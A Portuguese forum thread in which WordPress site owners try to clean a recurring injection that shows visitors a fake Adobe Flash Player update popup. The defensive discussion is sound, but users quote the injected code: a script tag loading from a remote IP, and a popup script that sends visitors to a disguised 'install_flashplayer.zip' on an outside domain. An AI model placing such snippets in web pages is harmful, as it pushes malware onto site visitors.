AMORROBSTEN,
Correto, muito obrigado pela colaboração.
Por nada, eu que agradeço, e espero que tenha ajudado também.
Outra coisa,
PARA QUE FIQUE CLARO: NUNCA ACEITE ESSE APLICATIVO PEDINDO PRA INSTALAR ESSE PLUING, ACREDITO QUE SEJA POR ELE QUE O VIRUS SE INSTALA NO COMPUTADOR.
verdade, faz sentido. não é o plugin oficial
da adobe com certeza.
O que eu fiz foi apagar todos os registros “<script…” dos títulos dos meus posts, direto via phpmyadmin. Em seguida baixei plugins de segurança, em especial um que permite alterar o prefixo das tabelas de banco de dados “wp_” para outro qualquer.
Depois disso tudo, passei antivírus no meu PC assim como o AMORROBSTEN fez.
Aparentemente resolveu.
Pessoal, tenho o mesmo problema há vários meses.
Sempre elimino os scripts e sempre voltam depois de + ou – 10 dias…
Na maioria das vezes é criado um Widget com um código assim: <script src=”http://131.244.39.41/br/flashplayer”></script>
O que muda é só o IP em cada ataque. Eu estava com esse problema em um site, só que ontem começou em outro site.
O que resolveu foi com a instalação do WP-Sentinel, não tive mais problema com o SCRIPT, mas o WP-Sentinel sempre estava bloqueando o site então desinstalei.
Já fiz diversas coisas como: Mudar de tema {Original pago}, apagar plugins suspeitos, reinstalar completamente o WordPress.
Não sei mais o que fazer, estou pensando em mudar a pasta principal, exemplo: http://www.site.com.br/novo
Percebo que aparentemente é uma invasão externa, penso que algum servidor {programado} faz esse injeção do código malicioso.
Meu site também gerou esse vírus… mas a linha de código não estava nos títulos, então fiz uma pesquisa geral em todas tabelas pelo PHPMYADMIN e ela estava na coluna WP-OPTIONS.
Mas, aparentemente ta funcionando.
Fiz a limpeza e varredura. Agora tá ok!
Valew pela dica!
O problema voltou… o jeito foi trocar de hospedagem, instalar novo wp, exportar banco de dados e fim.
HalaneGonzaga, não adianta fazer isso. Já passei por três hospedagens, em cada uma eu comecei do zero e o problema sempre aparece.
Estou nessa desde o começo de 2013, está muito complicado! Todo dia eu tento novos métodos, mas até agora se eu deixo o site duas horas, quando eu volto ele já está com o código inserido.
Minha esperança é uma atualização do WordPress!
Galera, hoje pela madrugada aconteceu comigo. O código que apareceu foi bem diferente, esse: `<script type=”text/javascript”>
$(document).ready(function() {
uLightBox.init({
override:false,
background: ‘black’,
centerOnResize: true,
fade: true
});
{
uLightBox.alert({
width: ‘585px’,
title: ‘Para Continuar Atualize o Adobe@ Flash Player’,
rightButtons: [‘Instalar’],
opened: function() {
$(‘<span />’).html(“<a style=’border:0;’ onClick=’uLightBox.clear();’ href=’http://juslog.com.br/Plugins/popup/install_flashplayer.zip’ target=’_blank’><img src=’./popup/flash-player.png’></a>”).appendTo(‘#lbContent’);
},
onClick: function(button) {
uLightBox.clear();
location = “http://juslog.com.br/Plugins/popup/install_flashplayer.zip”;
}
});
}
});
</script>`
Mas além desse código, apareceu uma pasta chamada POPUP no FTP. E quando eu tentava excluí-la, dava erro tanto no FTP, quanto no gerenciador de arquivos da minha hospedagem. Vejam se vocês não estão com essa pasta também, porque nela está o código malicioso.
Se você foi atacado, você pode antes de tudo trocar os <?php the_title(); ?> do tema por <?php echo strip_tags(get_the_title()); ?>. Isso vai fazer com que códigos HTML inseridos nos títulos de posts não cheguem até o usuário final. É uma medida paliativa, mas vai segurar um pouco enquanto você faz um checklist de segurança e limpa o seu WordPress, ok?
Esse tipo de vulnerabilidade acontece principalmente por conta do prefixo da tabela do WordPress, que a maioria dos sites usa a padrão “wp_” e por plugins que possuem falha de segurança. O mais importante é atualizar o sistema (wordpress, theme e plugins), trocar o prefixo da tabela de “wp_” para outro e seguir os procedimentos de segurança de alguns plugins como o Better Wp Security ou Wp Security Scan.
Será necessário remover o código direto no banco, depois de efetuar esses procedimentos, você precisa procurar pelo código nos posts e widgets e remover manualmente um a um ou usando uma busca com sql, como alguns já comentaram por aqui.
Se precisar de um trabalho mais avançado de limpeza ou segurança para WP, entre em contato comigo pelo richard [@] homemmaquina.com.br.
Abração e espero que seja útil.
Realmente lucascms… agora, eu reinstalei o wp, atualizei todos plugins…. verifiquei se tinha esse código no banco de dados. Ele já ta a umas semanas sem problema.
E hoje voltou de novo. kkkkkkkk ohhh Judiação
Pessoal, estou com o mesmo problema a meses já tinha largado os bets mas com a dica do richardbarros pelo menos não afeta os usuários do site.
Tentei renomear o prefixo da tabela e não adiantou.
Mas hoje descobri uma coisa, entrei no log do post que sempre é alterado o titulo com o script maldito que da o redirect, e a modificação sempre é feita por um usuário secundário que eu criei, que nem é utilizado.
Removi esse usuário, e estou rezando para que seja sanado esse problema.
HalaneGonzaga veja no log do seu post qual usuário que está modificando o post, por favor, pra ver se é um usuário secundário.
Obrigado galera
Onde eu vejo esse log? rs… não entendi.
Então Helane,
Não sei como chegar ao log,
Aconteceu que bem na hora que eu fui editar um post o ‘virus’ ou sei lá o que tinha modificado meu post.
Aí apareceu que eu tava editando uma versão antiga e pediu pra comprar, e mostrou todas as alterações realizadas nesse post.
Vou tentar descobrir e te aviso.
Seus wordpress só tem o usuário principal? normalmente chamado de admin, ou tem mais algum?
